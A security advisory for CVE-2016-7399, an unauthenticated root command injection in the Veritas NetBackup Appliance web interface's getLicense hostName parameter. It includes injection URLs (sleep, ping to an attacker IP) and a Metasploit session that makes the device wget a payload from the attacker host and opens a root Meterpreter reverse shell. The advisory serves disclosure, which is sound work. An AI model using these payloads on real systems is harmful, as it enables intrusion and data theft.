Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Severity : High
Advisory Name : Veritas NetBackup Appliance Unauthenticated Remote Command Execution
Discovery Date : 17/05/2016
Release Date : 04/10/2016
Application : NetBackup Appliance versions 2.6.0.1 through to v2.7.3, and the v3.0 series
Platform : Linux
CVE : CVE-2016-7399
CVSSv3 Base Score : 10.0
CVSSv3 Vector : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
Discovered by : Matthew Hall
Vendor Status : Emergency Engineering Binaries (EEBs) are available to fix this vulnerability on the following Encap releases of the NetBackup appliances: version 2.6.0.4, 2.6.1.2 and 2.7.3.
See https://www.veritas.com/support/en_US/article.000116055 for more information.
Veritas are aware that the issue is present in the current version of the product. A fix is scheduled for the NetBackup Appliances v3.0 release.
References : https://www.sec-1.com/blog
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7399
https://www.veritas.com/content/support/en_US/security/VTS16-002.html
https://www.veritas.com/support/en_US/article.000116055
https://nvd.nist.gov/vuln/detail/CVE-2016-7399

Vulnerability Summary

Unauthenticated Remote Command Execution

Description:
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.” (Source: OWASP).

“The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.” (Source: CWE-78)

Exploit

One instance was identified where an unauthenticated attacker could gain RCE on the underlying RedHat Linux operating system through the NetBackup Web Management Interface at the following URL:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=<argument>

The GET parameter “hostName” is controlled by the user and is ultimately used as an argument in a system call to a perl script located at /opt/NBUAppliance/scripts/license.pl

It is possible to utilise backticks, semi-colon, ampersand, pipe characters and the bash subshell contruct “$()” to execute commands on the underlying operating system as the user which calls the license.pl script (root in this case).

As this vulnerability allows an unauthenticated attacker to gain root level privileges on the affected device, the effects could include:

  • Recovering sensitive data from system backups
  • Stealing cached credentials/password hashes from virtual machines backed up to the device
  • Enrolling the system into a botnet
  • Installation of a rootkit/backdoor for remote persistence into an internal network

Example Payload/POC

The RCE is “blind” – that is, the response from the server does not include the results of executed commands; as such, the following proof of concept can be used.

Calling the following URL will result in the server response being delayed by six seconds:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(sleep%206)

Testing for command execution can also be performed using Out of Band techniques such as “ping” or “nslookup”, e.g:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(ping%20<attackers_IP_address>%20-c2)

Performing a network capture from the attackers IP address should show the server sending two ICMP echo requests.

Exploit Example

A fully working exploit has been created for this issue for use within the Metasploit Framework. An example of its use is shown below.

This module available at the following URL until its incorporation into the Metasploit Framework – GitHub

msf > use exploit/linux/http/veritas_netbackup_exec
msf exploit(veritas_netbackup_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(veritas_netbackup_exec) > set RHOST 192.168.114.10
LHOST => 192.168.114.10
msf exploit(veritas_netbackup_exec) > set RPORT 443
RPORT => 443
msf exploit(veritas_netbackup_exec) > set SSL true
SSL => true
msf exploit(veritas_netbackup_exec) > info

Name: Veritas NetBackup Appliance Web Console OS Command Injection
Module: exploit/linux/http/veritas_netbackup_exec
Platform: Linux, Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-05-17

Provided by:
Matthew Hall

Available targets:
Id Name
-- ----
0 CMD
1 Linux Payload

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOWNFILE no Filename to download, (default: random)
DOWNHOST no An alternative host to request the payload from
HTTP_DELAY 60 yes Time that the HTTP Server will wait for the ELF payload request
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.114.10 yes The target address
RPORT 443 yes The target port
SRVHOST 192.168.114.254 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:

Description:
The Veritas NetBackup Appliance is vulnerable to an unauthenticated
OS Command Injection Vulnerability via arguments passed to backend
perl scripts when performing license verification. Since it is a
blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. This module was
tested against a Veritas NetBackup Appliance Version 2.7.2. A ping
command against a controlled system could be used for testing
purposes. The exploit uses the wget client from the device to
convert the command injection into an arbitrary payload execution.

msf exploit(veritas_netbackup_exec) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.114.254:4444
msf exploit(veritas_netbackup_exec) > [*] 192.168.114.10:443 - Starting up our web service on http://192.168.114.254:8080/lKYbcvGEQ ...
[*] Using URL: http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Asking the Veritas device to download http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /usr/bin/wget%20http://192.168.114.254:8080/lKYbcvGEQ%20-O%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Sending the payload to the server...
[*] 192.168.114.10:443 - Waiting for the victim to request the ELF payload...
[*] 192.168.114.10:443 - Asking the Veritas device to chmod lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command chmod%20777%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Asking the Veritas device to execute lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /tmp/hbtoqwqc
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.114.10
[*] Meterpreter session 1 opened (192.168.114.254:4444 -> 192.168.114.10:33662) at 2016-05-17 12:36:28 +0100
[+] Deleted /tmp/hbtoqwqc

msf exploit(veritas_netbackup_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : .site
OS : Linux .site 2.6.32-504.30.3.el6.x86_64 #1 SMP Thu Jul 9 15:20:47 EDT 2015 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter >

meterpreter > ls
Listing: /opt/SYMCnbappws
=========================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40700/rwx------ 4096 dir 2016-04-27 12:57:23 +0100 Security
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:14 +0100 XSD
100664/rw-rw-r-- 7548948 fil 2016-01-20 12:48:40 +0000 appliancews.war
40775/rwxrwxr-x 4096 dir 2016-04-27 13:30:51 +0100 bin
40775/rwxrwxr-x 4096 dir 2016-04-30 15:40:17 +0100 config
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:15 +0100 docs
40775/rwxrwxr-x 4096 dir 2016-04-27 12:57:25 +0100 eat
40755/rwxr-xr-x 4096 dir 2016-04-27 12:29:49 +0100 jre
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 lib
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 resources
100755/rwxr-xr-x 12223204 fil 2016-01-20 13:06:50 +0000 server-2.7.2.war
100664/rw-rw-r-- 9722862 fil 2016-01-20 12:48:40 +0000 symhelp.war
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:22 +0100 webserver

meterpreter > pwd
/opt/SYMCnbappws

Vendor Response

As of version 2.6.0.4, 2.6.1.2 and 2.7.3 this vulnerability has been reported as being fixed. Veritas are aware that the issue is present in the current version of the product. A fix has been scheduled for the NetBackup Appliances v3.0 release.
Sec-1 would like to thank Veritas for their very professional and prompt responses in dealing with this matter.

This entry was posted in Advisories, Tools. Bookmark the permalink.

Comments are closed.